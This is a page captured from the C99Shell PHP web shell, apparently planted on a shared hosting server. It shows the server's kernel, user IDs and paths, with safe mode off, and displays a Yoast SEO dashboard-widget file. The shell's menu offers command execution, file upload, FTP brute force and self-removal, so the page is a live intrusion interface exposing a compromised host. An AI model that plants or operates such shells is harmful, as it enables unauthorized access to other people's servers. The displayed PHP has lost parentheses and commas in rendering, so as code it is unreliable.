!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/views/   drwxr-xr-x
Free 181.05 GB of 490.84 GB (36.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dashboard-widget.php (4.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 *
 * @var array $statistics {
 *      An array of statistics to display
 *
 *      @type string $seo_rank The SEO rank that this item represents
 *      @type string $title The title for this statistic
 *      @type string $class The class for the link
 *      @type int $count The amount of posts that meets the statistic requirements
 * }
 */

?>
<p><?php _e'Below are your published posts&#8217; SEO scores. Now is as good a time as any to start improving some of your posts!''wordpress-seo' ); ?></p>
<ul class="wpseo-dashboard-overview-scores">
    <?php foreach ( $statistics as $statistic ) :
        if ( 
current_user_can'edit_others_posts' ) === false ) {
            
$url esc_urladmin_url'edit.php?post_status=publish&post_type=post&seo_filter=' $statistic['seo_rank'] . '&author=' get_current_user_id() ) );
        }
        else {
            
$url esc_urladmin_url'edit.php?post_status=publish&post_type=post&seo_filter=' $statistic['seo_rank'] ) );
        }
    
?>
    <li>
        <span class="wpseo-dashboard-overview-post-score">
            <span class="wpseo-score-icon <?php echo sanitize_html_class$statistic['icon_class'] ); ?>"></span>
            <a href="<?php echo $url?>"
                class="wpseo-glance <?php echo esc_attr$statistic['class'] ); ?>">
                <?php printf$statistic['title'], intval$statistic['count'] ) ); ?>
                <span class="screen-reader-text">(<?php echo absint$statistic['count'] ); ?>)</span>
            </a>
        </span>
        <span class="wpseo-dashboard-overview-post-count" aria-hidden="true">
            <?php echo absint$statistic['count'] ); ?>
        </span>
    </li>
    <?php endforeach; ?>
</ul>
<?php $can_access is_multisite() ? WPSEO_Utils::grant_access() : current_user_can'manage_options' );
if ( ! empty( 
$onpage ) && $can_access ) : ?>
<div class="onpage">
    <h3><?php
        printf
(
            
/* translators: 1: expands to OnPage.org */
            
__'Indexability check by %1$s''wordpress-seo' ),
            
'OnPage.org'
        
);
    
?></h3>

    <p>
        <?php
        
/**
         * @var array $onpage Array containing the indexable and can_fetch value.
         */
        
switch ( $onpage['indexable'] ) :
            case 
WPSEO_OnPage_Option::IS_INDEXABLE :
                echo 
'<span class="wpseo-score-icon good"></span>';
                
_e'Your homepage can be indexed by search engines.''wordpress-seo' );

                break;
            case 
WPSEO_OnPage_Option::IS_NOT_INDEXABLE :
                echo 
'<span class="wpseo-score-icon bad"></span>';
                
printf(
                    
/* translators: 1: opens a link to a related knowledge base article. 2: closes the link */
                    
__'%1$sYour homepage cannot be indexed by search engines%2$s. This is very bad for SEO and should be fixed.''wordpress-seo' ),
                    
'<a href="' WPSEO_Shortlinker::get'https://yoa.st/onpageindexerror' ) . '" target="_blank">',
                    
'</a>'
                
);
                break;
            case 
WPSEO_OnPage_Option::CANNOT_FETCH :
                echo 
'<span class="wpseo-score-icon na"></span>';
                
printf(
                    
/* translators: %1$s opens a link to a related knowledge base article, %2$s expands to Yoast SEO, %3$s closes the link. */
                    
__'%1$s%2$s has not been able to fetch your site\'s indexability status%3$s from OnPage.org''wordpress-seo' ),
                    
'<a href="' WPSEO_Shortlinker::get'https://yoa.st/onpagerequestfailed' ) . '" target="_blank">',
                    
'Yoast SEO',
                    
'</a>'
                
);
                break;
            case 
WPSEO_OnPage_Option::NOT_FETCHED :
                echo 
'<span class="wpseo-score-icon na"></span>';
                echo 
esc_htmlsprintf(
                    
/* translators: %s expands to Yoast SEO. */
                    
__'%s has not fetched your site\'s indexability status yet from OnPage.org''wordpress-seo' ),
                    
'Yoast SEO'
                
) );
                break;
        endswitch;
        
?>
    </p>

    <p>
        <?php
        
if ( $onpage['indexable'] !== WPSEO_OnPage_Option::IS_INDEXABLE && $onpage['can_fetch'] ) :
            echo 
'<a class="fetch-status button" href="' esc_attradd_query_arg'wpseo-redo-onpage''1' ) ) . '#wpseo-dashboard-overview">' __'Fetch the current status''wordpress-seo' ) . ' </a> ';
        endif;

        echo 
'<a class="landing-page button" href="https://onpage.org/yoast-indexability/" target="_blank">' __'Analyze entire site''wordpress-seo' ) . ' </a>';
        
?>
    </p>
</div>
    <?php
endif;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0144 ]--